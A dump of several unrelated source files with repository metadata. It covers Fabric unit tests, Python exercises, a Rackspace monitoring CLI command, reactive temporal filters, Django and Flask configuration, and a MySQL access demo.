    if setup:
        model, optimizer = fabric.setup(unwrapped_model, unwrapped_optimizer)
        assert isinstance(model, _FabricModule)
        assert isinstance(optimizer, _FabricOptimizer)
    else:
        model, optimizer = unwrapped_model, unwrapped_optimizer

    state = {"model": model, "optimizer": optimizer, "int": 0, "dict": {"x": 0}}
    expected = {"model": model, "optimizer": optimizer, "int": 5, "dict": {"x": 1}}
    remainder = fabric.load(tmp_path, state)
    assert state == expected
    assert remainder == expected_remainder
def test_barrier():
    """`Fabric.barrier()` must simply delegate to the strategy's barrier."""
    fab = Fabric()
    strategy_mock = Mock()
    fab._strategy = strategy_mock
    fab.barrier("test")
    # The barrier name is forwarded as a keyword argument.
    strategy_mock.barrier.assert_called_once_with(name="test")
def test_broadcast():
    """Test that `Fabric.broadcast()` calls into the strategy."""
    fabric = Fabric()
    fabric._strategy = Mock()
    fabric.broadcast(torch.tensor(1), src=2)
    # The object and the source rank are forwarded to the strategy unchanged.
    fabric._strategy.broadcast.assert_called_once_with(torch.tensor(1), src=2)
def test_all_gather():
    """Test that `Fabric.all_gather()` applies itself to collections and calls into the strategy."""
    fabric = Fabric()
    fabric._strategy = Mock(root_device=torch.device("cpu"))
    # The keyword defaults Fabric is expected to forward for every tensor.
    defaults = {"group": None, "sync_grads": False}

    # single tensor
    fabric.all_gather(torch.tensor(1))
    fabric._strategy.all_gather.assert_called_once_with(torch.tensor(1), **defaults)
    fabric._strategy.reset_mock()

    # list: gathered per element; non-tensor entries (the string) are left alone
    fabric.all_gather([torch.tensor(2), torch.tensor(3), "string"])
    fabric._strategy.all_gather.assert_has_calls([call(torch.tensor(2), **defaults), call(torch.tensor(3), **defaults)])
    fabric._strategy.reset_mock()

    # dict: applied recursively to nested containers
    fabric.all_gather({"a": torch.tensor(4), "b": [torch.tensor(5)], "c": "string"})
    fabric._strategy.all_gather.assert_has_calls([call(torch.tensor(4), **defaults), call(torch.tensor(5), **defaults)])
def test_all_reduce():
    """Test that `Fabric.all_reduce()` applies itself to collections and calls into the strategy."""
    fabric = Fabric()
    fabric._strategy = Mock(root_device=torch.device("cpu"))
    # The keyword defaults Fabric is expected to forward for every tensor.
    defaults = {"group": None, "reduce_op": "mean"}

    # single tensor
    fabric.all_reduce(torch.tensor(1))
    fabric._strategy.all_reduce.assert_called_once_with(torch.tensor(1), **defaults)
    fabric._strategy.reset_mock()

    # list: reduced per element; non-tensor entries (the string) are left alone
    fabric.all_reduce([torch.tensor(2), torch.tensor(3), "string"])
    fabric._strategy.all_reduce.assert_has_calls([call(torch.tensor(2), **defaults), call(torch.tensor(3), **defaults)])
    fabric._strategy.reset_mock()

    # dict: applied recursively to nested containers
    fabric.all_reduce({"a": torch.tensor(4), "b": [torch.tensor(5)], "c": "string"})
    fabric._strategy.all_reduce.assert_has_calls([call(torch.tensor(4), **defaults), call(torch.tensor(5), **defaults)])
@pytest.mark.parametrize("clip_val,max_norm", [(1e-3, None), (None, 1)])
def test_grad_clipping(clip_val, max_norm):
    """Test that `clip_gradients` dispatches to value- or norm-based clipping on the strategy."""
    fabric = Fabric(devices=1)

    fabric.strategy.clip_gradients_norm = Mock()
    fabric.strategy.clip_gradients_value = Mock()

    torch_model = nn.Linear(1, 1)
    torch_optimizer = torch.optim.SGD(torch_model.parameters(), lr=1e-3)
    model, optimizer = fabric.setup(torch_model, torch_optimizer)

    loss = model(torch.rand(1, 1).to(fabric.device))
    fabric.backward(loss)

    # Nothing may be clipped before clip_gradients() is called.
    fabric.strategy.clip_gradients_value.assert_not_called()
    fabric.strategy.clip_gradients_norm.assert_not_called()

    fabric.clip_gradients(model, optimizer, max_norm=max_norm, clip_val=clip_val)

    # Exactly one of the two clipping strategies runs, with the raw objects.
    if clip_val is not None:
        fabric.strategy.clip_gradients_value.assert_called_once_with(torch_model, torch_optimizer, clip_val=clip_val)
        fabric.strategy.clip_gradients_norm.assert_not_called()
    else:
        fabric.strategy.clip_gradients_value.assert_not_called()
        fabric.strategy.clip_gradients_norm.assert_called_once_with(
            torch_model, torch_optimizer, max_norm=max_norm, norm_type=2.0, error_if_nonfinite=True
        )
| [
"noreply@github.com"
] | SkafteNicki.noreply@github.com |
72400439926869248265447bf85cbabdb44fbf32 | 25b0e82ec0ba2b667e6ae429e59e19333a641723 | /Python/NPTEL/src/Week7/P10.py | 6a2578fdb3ed31ec6069f5236a04636495a1740f | [] | no_license | donkhan/msc | cf897a6dbfd72845074d13842351e49ebcf04557 | 73bc12fd3ad86e6915f51adc08af836dfdc52747 | refs/heads/master | 2021-07-10T06:43:52.687825 | 2020-11-09T06:54:14 | 2020-11-09T06:54:14 | 211,588,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 563 | py | def func():
print()
c = 10
i = 3
while i <= 6:
j = 0
while j <= 20:
if j >= 10-i and j <= 10+i:
print("*",end = " ")
else:
print(" ",end = " ")
j = j + 1
print("\n")
i = i + 1
i = 6
while i >= 3:
j = 0
while j<= 20:
if j >= 10 - i and j <= 10 + i:
print("*", end=" ")
else:
print(" ", end=" ")
j = j + 1
print("\n")
i = i - 1
func()
| [
"donkhan"
] | donkhan |
a551061f954363fe867ae576ead48d3683dcf790 | 0f1bec24ebc7eab0a29ce433aef9ef937c91ebb7 | /commands/raxmon-monitoring-zones-traceroute | 1cc7f381fa91003d853fdb73e52ad896a86c003a | [] | no_license | bravelittlescientist/rackspace-monitoring-cli | d3f178cd1cb6e0b5675b6d2b46b0ecdaa9dcb210 | 600b08956e93fc8b61a095e4eaac45b7a637e8c1 | refs/heads/master | 2021-01-17T23:10:47.752809 | 2014-07-01T09:03:56 | 2014-07-01T09:03:56 | 21,474,623 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,677 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pprint import pprint
try:
import simplejson as json
except ImportError:
import json
from raxmon_cli.common import run_action
from raxmon_cli.utils import str_to_dict, str_to_list
# Command-line options understood by this tool; each entry is the
# (argument names, parser keyword arguments) pair handed to raxmon's
# shared option parser.
OPTIONS = [
    [['--id'], {'dest': 'id', 'help': 'Monitoring zone id'}],
    [['--target'], {'dest': 'target', 'help': 'Target hostname or IP address'}],
    [['--target-resolver'], {'dest': 'target_resolver', 'help': 'Target resolver', 'default': 'IPv4'}]
]

# Options which must be supplied for the command to run.
REQUIRED_OPTIONS = ['id', 'target']
def callback(driver, options, args, callback):
    """Run a traceroute from the requested monitoring zone and pretty-print it.

    ``driver`` is the Rackspace monitoring driver, ``options`` carries the
    parsed command-line options (``id``, ``target``, ``target_resolver``).
    """
    # The traceroute API needs the zone object, so look it up by id first.
    zone = driver.get_monitoring_zone(monitoring_zone_id=options.id)
    traceroute_result = driver.ex_traceroute(
        monitoring_zone=zone,
        target=options.target,
        target_resolver=options.target_resolver,
    )
    pprint(traceroute_result)
# Wire everything into the shared CLI driver: parse the options above,
# authenticate, then invoke `callback` for the "monitoring_zones traceroute"
# action.
run_action(OPTIONS, REQUIRED_OPTIONS, 'monitoring_zones', 'traceroute',
           callback)
| [
"tomaz@tomaz.me"
] | tomaz@tomaz.me | |
841aba801d2d071d8dab9e4d3c0c83c024477335 | 09a8648805c390594be0908da3188f287dedc471 | /src/fundamental/accessMySQL.py | 3f65949cbc8cda3b336ba5d34b37f441ec62c19a | [
"Apache-2.0"
] | permissive | lgonline/mp | 9d17abbb41ff42fbaf1666059504e2377485c6a9 | 21ef1bfb2feacf6a7abda858c083e0c49878f889 | refs/heads/master | 2020-12-29T02:36:32.332387 | 2019-11-16T03:02:02 | 2019-11-16T03:02:02 | 44,308,720 | 1 | 1 | null | 2015-10-20T16:24:08 | 2015-10-15T09:50:46 | Python | UTF-8 | Python | false | false | 1,190 | py | __author__ = 'Administrator'
import os,sys
import pymysql
def sampleConnMysql():
    """Connect to the local ``bm`` database and print every row of ``userinfo``.

    On any failure the error is reported (instead of the original silent,
    detail-free message) and, unlike the original, the cursor and the
    connection are always closed, even when an exception occurs.
    """
    conn = None
    cur = None
    try:
        conn = pymysql.connect(host='localhost', user='root', passwd='123456',
                               db='bm', port=3306, charset='utf8')
        cur = conn.cursor()
        cur.execute('select userid,name,password from userinfo')
        for userid, name, password in cur.fetchall():
            # Same output format as the original implementation.
            print("userid: " + str(userid) + ' name: ' + name + " password: " + password)
    except Exception as exc:
        # Fix: include the actual error instead of a misspelled generic message.
        print("the exception was thrown: %s" % exc)
    finally:
        # Fix: the original leaked both resources whenever an exception occurred.
        if cur is not None:
            cur.close()
        if conn is not None:
            conn.close()
def connMySQLDemo():
    """Recreate the demo database ``mpdb``, fill the ``users`` table and print it.

    Connects as root to the local MySQL server, drops any pre-existing
    ``mpdb`` database (best effort), recreates the schema, inserts four
    sample rows, commits and prints every row of ``users``.
    """
    # The module-level `import pymysql` is used; the original's redundant
    # function-local import has been removed.
    conn = pymysql.Connection(host='127.0.0.1', user='root', passwd='123456')
    cur = conn.cursor()
    try:
        try:
            # Best effort: the database may not exist yet on a fresh server.
            cur.execute("drop database mpdb")
        except Exception as e:
            print(e)
        cur.execute("create database mpdb")
        cur.execute("use mpdb")
        cur.execute("create table users(id int,name varchar(8))")
        cur.execute("insert into users values(1,'www'),(2,'cnblogs'),(3,'com'),(4,'peter')")
        cur.execute('select * from users')
        for row in cur.fetchall():
            print(row)
        conn.commit()
    finally:
        # Fix: always release resources (the original leaked the connection
        # whenever one of the statements raised).
        cur.close()
        conn.close()
if __name__ == '__main__':
    # Entry point intentionally does nothing; call sampleConnMysql() or
    # connMySQLDemo() manually to run the demos.
    pass
"lg_online@hotmail.com"
] | lg_online@hotmail.com |
b4e3b4667c69118029a269934e52e7bb9da1a061 | a6c0f3914395569cdd637d9bdc2f83406977f7e6 | /yarp/temporal.py | d966a1c6cbae5fc866a5392ef97c90fdd00128e4 | [] | no_license | mossblaser/yarp | 524bb0b5275a37b8d34b54c0cd84bf6636ab5cab | 236892b4ee6b58c8b9c59c61b17b259c35851d43 | refs/heads/master | 2022-12-11T08:45:29.308116 | 2018-12-24T23:07:36 | 2018-12-24T23:07:36 | 121,685,509 | 4 | 1 | null | 2022-12-07T01:21:16 | 2018-02-15T21:34:48 | Python | UTF-8 | Python | false | false | 10,141 | py | """
Temporal filters for :py:class:`Value` values.
"""
import asyncio
from yarp import NoValue, Value, ensure_value
# Public API of this module. Fix: ``__all__`` is the attribute Python uses to
# control ``from yarp.temporal import *``; the original ``__names__`` spelling
# has no special meaning. ``__names__`` is kept as a backwards-compatible alias.
__all__ = [
    "delay",
    "time_window",
    "rate_limit",
]
__names__ = __all__
def delay(source_value, delay_seconds, loop=None):
    r"""
    Return a :py:class:`Value` which follows ``source_value`` after a delay.

    Works for both instantaneous and continuous :py:class:`Value`\ s; for
    continuous ones the initial value appears on the output immediately.

    ``delay_seconds`` may be a constant or a :py:class:`Value` holding the
    delay in seconds. Increasing it postpones values which are already in
    flight; decreasing it releases them earlier — immediately, one after
    another, if they are already overdue.

    ``loop`` is the :py:class:`asyncio.BaseEventLoop` used for scheduling
    (the default event loop when ``None``).
    """
    source_value = ensure_value(source_value)
    delay_seconds = ensure_value(delay_seconds)
    output_value = Value(source_value.value)
    loop = loop or asyncio.get_event_loop()

    # Queue of (insertion_time, value, instantaneous_value, handle) tuples,
    # oldest first, for changes which are still waiting to be emitted.
    pending = []

    def emit_oldest():
        """Internal. Emit the oldest queued change on the output."""
        _t_in, value, instantaneous_value, _handle = pending.pop(0)
        output_value._value = value
        output_value.set_instantaneous_value(instantaneous_value)

    @source_value.on_value_changed
    def on_source_value_changed(instantaneous_value):
        """Internal. Queue up an incoming change for later emission."""
        t_in = loop.time()
        handle = loop.call_at(t_in + delay_seconds.value, emit_oldest)
        pending.append(
            (t_in, source_value.value, instantaneous_value, handle))

    @delay_seconds.on_value_changed
    def on_delay_seconds_changed(_new_delay_seconds):
        """Internal. Re-schedule queued changes when the delay changes."""
        nonlocal pending
        now = loop.time()
        max_age = delay_seconds.value
        # Flush anything which is already overdue under the new delay. The
        # queue is ordered oldest-first, so we can stop at the first entry
        # which is still young enough.
        while pending and (now - pending[0][0]) >= max_age:
            pending[0][3].cancel()
            emit_oldest()
        # Re-schedule everything which remains in the queue.
        rescheduled = []
        for t_in, value, instantaneous_value, handle in pending:
            handle.cancel()
            rescheduled.append(
                (t_in, value, instantaneous_value,
                 loop.call_at(t_in + delay_seconds.value, emit_oldest)))
        pending = rescheduled

    return output_value
def time_window(source_value, duration, loop=None):
    """Produce a moving window over a :py:class:`Value`'s historical values
    within a given time period.

    This function treats the :py:class:`Value` it is passed as a persistent
    :py:class:`Value`, even if it is instantaneous (since a window function
    doesn't really have any meaning for an instantaneous value).

    The ``duration`` may be a constant or a (persistent) Value giving the
    window duration as a number of seconds. The duration should be a number of
    seconds greater than zero and never be ``NoValue``. If the value is
    reduced, previously inserted values will be expired earlier, possibly
    immediately if they should already have expired. If the value is increased,
    previously inserted values will have an increased timeout.

    The ``loop`` argument should be an :py:class:`asyncio.BaseEventLoop` in
    which windowing will be scheduled. If ``None``, the default loop is used.
    """
    source_value = ensure_value(source_value)
    output_value = Value([source_value.value])

    # A queue of (insertion_time, handle) pairs for calls to expire values
    # currently in the window. Invariant: one timer per *superseded* value,
    # i.e. len(timers) == len(output_value.value) - 1 — the current value
    # never expires until it has been replaced.
    timers = []

    duration = ensure_value(duration)
    loop = loop or asyncio.get_event_loop()

    def expire_value():
        """Internal. Removes the oldest value from the window."""
        timers.pop(0)
        output_value.value = output_value.value[1:]

    def schedule_value_expiration():
        """
        Internal. Schedule the removal of the just-superseded value from the
        window once the window duration has passed.
        """
        now = loop.time()
        timers.append((now, loop.call_at(now + duration.value, expire_value)))

    @source_value.on_value_changed
    def on_source_value_changed(new_value):
        """Internal. Adds the new value to the window when the input changes."""
        output_value.value = output_value.value + [new_value]
        schedule_value_expiration()

    @duration.on_value_changed
    def on_duration_changed(_instantaneous_new_duration):
        """Internal. Handle changes in the specified window duration."""
        nonlocal timers
        now = loop.time()
        new_duration = duration.value

        # Immediately expire any values in the window which are already older
        # than the new duration. The queue is ordered oldest-first, so stop at
        # the first young-enough timer.
        while timers:
            insertion_time, handle = timers[0]
            if now - insertion_time > new_duration:
                handle.cancel()
                expire_value()  # Side effect: removes handle from timers
            else:
                break

        # Modify the timeouts of all remaining expirations.
        def modify_timeout(insertion_time_and_handle):
            insertion_time, handle = insertion_time_and_handle
            handle.cancel()
            return (insertion_time,
                    loop.call_at(insertion_time + new_duration, expire_value))
        timers = [modify_timeout(t) for t in timers]

        # BUG FIX: the original also called schedule_value_expiration() here.
        # That appended an expiry timer with no corresponding newly-inserted
        # value, breaking the timers/window invariant: every duration change
        # eventually dropped one extra, still-current value from the window.

    return output_value
def rate_limit(source_value, min_interval=0.1, loop=None):
    """Prevent changes occurring above a particular rate, dropping or
    postponing changes if necessary.

    The ``min_interval`` argument may be a constant or a :py:class:`Value`. If
    this value is decreased, currently delayed values will be output early (or
    immediately if the value would have been output previously). If increased,
    the current delay will be increased.

    The ``loop`` argument should be an :py:class:`asyncio.BaseEventLoop` in
    which the delays will be scheduled. If ``None``, the default loop is used.
    """
    source_value = ensure_value(source_value)
    output_value = Value(source_value.value)

    min_interval = ensure_value(min_interval)

    loop = loop or asyncio.get_event_loop()

    # The last value to be received from the source
    last_value = None

    # Was last_value blocked from being sent due to the rate limit?
    last_value_blocked = False

    # The time (according to asyncio) the last blockage started. The
    # blockage will be cleared min_interval.delay seconds after this
    # time.
    last_block_start = None

    # The asyncio timer handle for the current blockage timer
    timer_handle = None

    # Is the rate limit currently being applied? (Initially yes for
    # persistant values, otherwise no)
    blocked = source_value.value is not NoValue

    def clear_blockage():
        """Internal. Timeout expired callback."""
        nonlocal blocked, last_value, last_value_blocked, last_block_start, timer_handle
        if last_value_blocked:
            # Pass the delayed value through
            output_value._value = source_value.value
            output_value.set_instantaneous_value(last_value)
            last_value = None
            last_value_blocked = False

            # Start the blockage again
            block()
        else:
            # No values queued up, just unblock
            blocked = False
            last_block_start = None
            timer_handle = None

    def block():
        """Setup a timer to unblock the rate_limit and output the last
        value."""
        nonlocal blocked, last_block_start, timer_handle
        blocked = True
        last_block_start = loop.time()
        timer_handle = loop.call_at(
            last_block_start + min_interval.value,
            clear_blockage)

    @source_value.on_value_changed
    def on_source_value_changed(new_value):
        nonlocal last_value, last_value_blocked
        if not blocked:
            # Pass the value change through
            output_value._value = source_value.value
            output_value.set_instantaneous_value(new_value)

            # Start a timeout
            block()
        else:
            # Keep the value back until we're unblocked
            last_value = new_value
            last_value_blocked = True

    @min_interval.on_value_changed
    def on_min_interval_changed(instantaneous_min_interval):
        nonlocal timer_handle
        now = loop.time()
        if not blocked:
            # No blockage in progress, nothing to do
            pass
        elif now - last_block_start >= min_interval.value:
            # New timeout has already expired, unblock immediately
            timer_handle.cancel()
            clear_blockage()
        else:
            # Reset timer for new time
            timer_handle.cancel()
            timer_handle = loop.call_at(
                last_block_start + min_interval.value,
                clear_blockage)

    # Persistent sources start out blocked, so arm the timer which will
    # eventually clear that initial blockage.
    if blocked:
        block()

    return output_value
| [
"mail@jhnet.co.uk"
] | mail@jhnet.co.uk |
44e1074a660ff7b36fd8603cd447819137ad3819 | ead9779110c2a0371ba3354b4bae4c5aa351424f | /project/project-template/project_name/woot/settings/staging.py | b6fed3aa53e84f0dc8406a81501e98ee93d19af0 | [] | no_license | NicholasPiano/django-skeleton-templates | 744ced68cd0efb3cf3b2c05cc447c25ffdbc2bfb | 3677ac05acd48fe14fc1292452b909c2ca7d4a85 | refs/heads/master | 2021-01-20T04:30:19.676492 | 2015-03-28T19:09:12 | 2015-03-28T19:09:12 | 25,471,712 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,710 | py | # {{project_name}}.settings.staging
# django
# local
from woot.settings.common import *
# util
from os import environ
########## DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG CONFIGURATION
########## DATABASE CONFIGURATION
# Credentials come from the environment so they never need to live in the
# repository.
DATABASE_USER = environ.get('DB_USER')
DATABASE_PWD = environ.get('DB_PWD')
# mysql: https://github.com/PyMySQL/mysqlclient-python
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',  # Add 'postgresql_psycopg2' for PG
        'NAME': '',
        # Fix: the env-derived credentials above were read but never used;
        # wire them in (falling back to '' when the variables are unset).
        'USER': DATABASE_USER or '',
        'PASSWORD': DATABASE_PWD or '',
        'HOST': '',  # Set to empty string for localhost.
        'PORT': '',  # Set to empty string for default.
    }
}
########## END DATABASE CONFIGURATION
########## CACHE CONFIGURATION
# Local memcached instance on memcached's default port.
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': '127.0.0.1:11211',
    }
}
########## END CACHE CONFIGURATION

########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# '{{ secret_key }}' is a template placeholder, substituted when the project
# is generated from this template.
SECRET_KEY = '{{ secret_key }}'
########## END SECRET CONFIGURATION

########## TOOLBAR CONFIGURATION
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INSTALLED_APPS += (
    'debug_toolbar',
)

# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
# The toolbar is only shown to requests originating from these IPs.
INTERNAL_IPS = ('127.0.0.1',)

# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
MIDDLEWARE_CLASSES += (
    'debug_toolbar.middleware.DebugToolbarMiddleware',
)

DEBUG_TOOLBAR_CONFIG = {
}
########## END TOOLBAR CONFIGURATION
| [
"nicholas.d.piano@gmail.com"
] | nicholas.d.piano@gmail.com |
9033c26e3bd828fc81eef756c10dad8deec587df | 4cc22dad5cd0e05ea22f5aa1177e5a85fb6471ad | /gokart_pipeliner/pipeliner.py | efe905e6e831fd4237b6b801e771b0537b963537 | [
"MIT"
] | permissive | hirosassa/gokart-pipeliner | 2029544626bb17e207fdc3a19a238139a8c2617d | ec9aef9228e0de2363520974a266c069ddea0e37 | refs/heads/main | 2023-02-01T01:09:19.001282 | 2020-12-12T13:03:51 | 2020-12-12T13:03:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from typing import List
import luigi
import gokart
from gokart_pipeliner.instantiation_task import InstantiationTask
from gokart_pipeliner.enum import TYPING
from gokart_pipeliner.config_manager import ConfigManager
class GokartPipeliner:
    """Convenience wrapper for instantiating and running gokart task pipelines."""

    def __init__(self,
                 params: TYPING.PARAMS = dict(),
                 config_path_list: TYPING.STR_LIST = list()):
        # NOTE(review): mutable defaults (dict()/list()) are shared across
        # calls; harmless only if ConfigManager never mutates them — confirm.
        self.config = ConfigManager(params, config_path_list)

    def run(self,
            tasks: List[luigi.task_register.Register],
            params: TYPING.PARAMS = dict()):
        """Instantiate the task chain and execute it with luigi's local scheduler."""
        params = self.config.make_running_params(params)
        task = InstantiationTask.run(tasks, params=params)
        luigi.build([task], local_scheduler=True)

    def print_dependence_tree(self,
                              tasks: List[luigi.task_register.Register],
                              params: TYPING.PARAMS = dict()):
        """Print the dependency tree of the instantiated task chain without running it."""
        params = self.config.make_running_params(params)
        task = InstantiationTask.run(tasks, params=params)
        print("//-----[dependence_tree]------")
        print(gokart.info.make_tree_info(task))
        print("//----------------------------")
| [
"6syun9@gmail.com"
] | 6syun9@gmail.com |
e0b7ad7303a8e55c71905b535a4ea019af5c1c13 | 727a528cb2361ef7ea2043f66daa8dfc02f1d56e | /movies_project/movies/management/commands/remove_unused_movies.py | 2aa804936cdeb24280b884a72b9a80e6d94ec7c2 | [
"MIT"
] | permissive | TonyGu423/movies | a6e11fb7b4c1b2feb3bc928cace77b8f7ab6e79f | dbdb234119f88939ee485df69536bdbc091b8909 | refs/heads/master | 2021-01-16T20:43:36.121985 | 2015-10-26T12:24:00 | 2015-10-26T12:24:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 340 | py | from movies.models import Movie
from django.core.management.base import BaseCommand
class Command(BaseCommand):
    """Management command that deletes movies with no related records."""

    help = 'Removes unused movies'

    def handle(self, *args, **options):
        # Single filtered query instead of one ``exists()`` query per movie
        # (the original looped over every movie, issuing N+1 queries).
        # ``records__isnull=True`` selects exactly the movies the original
        # loop deleted: those with no related ``records``.  Materialize the
        # queryset before deleting so we do not mutate it mid-iteration.
        for movie in list(Movie.objects.filter(records__isnull=True)):
            movie.delete()
            print(movie.title)
| [
"desecho@gmail.com"
] | desecho@gmail.com |
9f91e065dafd1449d8ae3bcc61105cccd7df254c | c41f97ac62188860534da88e7c809036857b1876 | /02-Code.py | 967d6c25ccf9d511d4796b3bca591b409288a54a | [] | no_license | ravi4all/AdvPython_March | 210280594bc4651583fc22ef7a6d45deecbce2fc | b6385d7f19025cdb1f061046603c66fdcfebc57a | refs/heads/master | 2020-04-29T07:59:04.193110 | 2019-03-23T12:41:38 | 2019-03-23T12:41:38 | 175,970,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | class Student():
id = None
name = None
marks = None
standard = 8
data = []
def showStudent(self,id,name,marks):
self.data.append([id,name,marks,self.standard])
print(self.data)
# Demo: because ``data`` is a class attribute, both instances append to the
# same list — the second call prints both records.
s_1 = Student()
s_1.standard = 9  # instance attribute shadows the class-level default (8)
s_1.showStudent(101,'Ram',78.6)
s_2 = Student()
s_2.showStudent(102,'Raman',86.5)
| [
"noreply@github.com"
] | ravi4all.noreply@github.com |
490864555c3152ac58cf916babb377112092e85c | 116acf603f5db8d626247355bf786c339ba95ea9 | /apps/inforguide/handler.py | 3a910bddbbc0ec0c4702466cf035bc334848fd3f | [] | no_license | dahunuaa/ZhihuiSMB_python3 | 0857afeec2337b44571986a9c70c26e716142ccb | 8db2708efccd5eefa393738500e326bd7fb65c21 | refs/heads/master | 2021-01-25T14:32:32.201879 | 2018-03-11T05:59:10 | 2018-03-11T05:59:10 | 123,703,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,324 | py | # -*- coding:utf-8 -*-
from ZhihuiSMB.apps.base.handler import MultiStandardHandler,SingleStandardHanler,TokenHandler
from ZhihuiSMB.libs.oauthlib import get_provider
from ZhihuiSMB.libs.loglib import get_logger
logger = get_logger("debug")
class InforguideListHandler(MultiStandardHandler,TokenHandler):
    """Collection endpoint for the inforguide model; GET and POST enabled."""
    _model = "inforguide.InforguideModel"
    enable_methods = ["post","get"]
    private = False  # presumably marks the endpoint as public — verify in TokenHandler
class InforguideHandler(SingleStandardHanler,TokenHandler):
    """Single-item endpoint for one inforguide entry; GET, PUT and DELETE enabled."""
    _model = "inforguide.InforguideModel"
    enable_methods = ["get","put","delete"]
    private = False
class InforguideClassifyHandler(MultiStandardHandler,TokenHandler):
    """GET-only endpoint returning the model's classify() output."""
    _model = "inforguide.InforguideModel"
    enable_methods = ["get"]
    private = False

    def get(self):
        # Delegate to the model and return its result in the standard
        # ``result`` response envelope.
        self.result["data"] = self.model.classify()
        self.finish(self.result)
class InforguideUpdateHandler(MultiStandardHandler,TokenHandler):
    """Triggers a model refresh; its route is commented out in ``handlers``."""
    _model = "inforguide.InforguideModel"
    enable_methods = ["get"]
    private = False

    def _get(self):
        # Leading underscore keeps this from being dispatched as a normal GET
        # handler — presumably intentional while the route is disabled.
        self.model.update()
# Route table: the specific "/classify" route must precede the catch-all
# "/(.*)" detail route.  The "/update" route is currently commented out.
handlers = [
    (r"",InforguideListHandler,get_provider("inforguide")),
    (r"/classify",InforguideClassifyHandler,get_provider("inforguide")),
    # (r"/update",InforguideUpdateHandler,get_provider("inforguide")),
    (r"/(.*)",InforguideHandler,get_provider("inforguide"))
]
| [
"dahu yao"
] | dahu yao |
8544d26a3c301bbbd0ba99500ab5335cb78b23ce | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02382/s791282888.py | a561149827dff37dff5d772184eb82b93aeb25a2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | #! python 3
# distance_ii.py
import math
def minkovski(a, b, p):
    """Return the Minkowski distance of order ``p`` between vectors a and b.

    ``p`` may be any positive number, or the string ``'inf'`` for the
    Chebyshev (L-infinity) distance.  ``a`` and ``b`` must be non-empty
    sequences of equal length.
    """
    # Per-coordinate absolute differences, shared by both branches.
    diffs = [abs(x - y) for x, y in zip(a, b)]
    if p == 'inf':
        # L-infinity norm: the largest coordinate difference.  Using max()
        # replaces the original manual scan loop.
        return max(diffs)
    # General case: (sum |x-y|^p)^(1/p); sum() replaces manual accumulation.
    return pow(sum(d ** p for d in diffs), 1 / p)
# Driver: read the (unused) vector length, then two integer vectors, and
# print the Minkowski distances for p = 1, 2, 3 and p = infinity.
n = int(input())
a = [int(x) for x in input().split(' ')]
b = [int(x) for x in input().split(' ')]
for p in [1, 2, 3, 'inf']:
    print('%.6f'%minkovski(a, b, p))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
abfea447ccb5dcc8cb7ef7aa9371f594739c1616 | 29f8b7f92eb22cc3134a16c439d3180e254df4bb | /chp12_flasktaskr_part05/project/__init__.py | d30a310dfbec437928b7a6cfbcc4ed4aac395547 | [] | no_license | Hemie143/realpython2 | 7df80dd5f61ce7cd8c31b8bf78111b8507cbdb36 | b8535ffe97594e1b18233bcd9aa0de664257cb09 | refs/heads/master | 2022-12-12T04:51:53.120131 | 2021-01-03T19:52:32 | 2021-01-03T19:52:32 | 208,735,855 | 0 | 0 | null | 2023-08-17T05:45:32 | 2019-09-16T07:22:16 | Python | UTF-8 | Python | false | false | 494 | py | # project/__init__.py
from flask import Flask
from flask_sqlalchemy import SQLAlchemy

# Module-level application object, configured from the sibling _config.py.
app = Flask(__name__)
app.config.from_pyfile('_config.py')
db = SQLAlchemy(app)

# Blueprints are imported only after ``app`` and ``db`` exist — presumably
# because the view modules import from this package (circular-import
# workaround); confirm against the view modules.
from chp12_flasktaskr_part05.project.users.views import users_blueprint
from chp12_flasktaskr_part05.project.tasks.views import tasks_blueprint
# from project.users.views import users_blueprint
# from project.tasks.views import tasks_blueprint

app.register_blueprint(users_blueprint)
app.register_blueprint(tasks_blueprint)
| [
"hemie143@gmail.com"
] | hemie143@gmail.com |
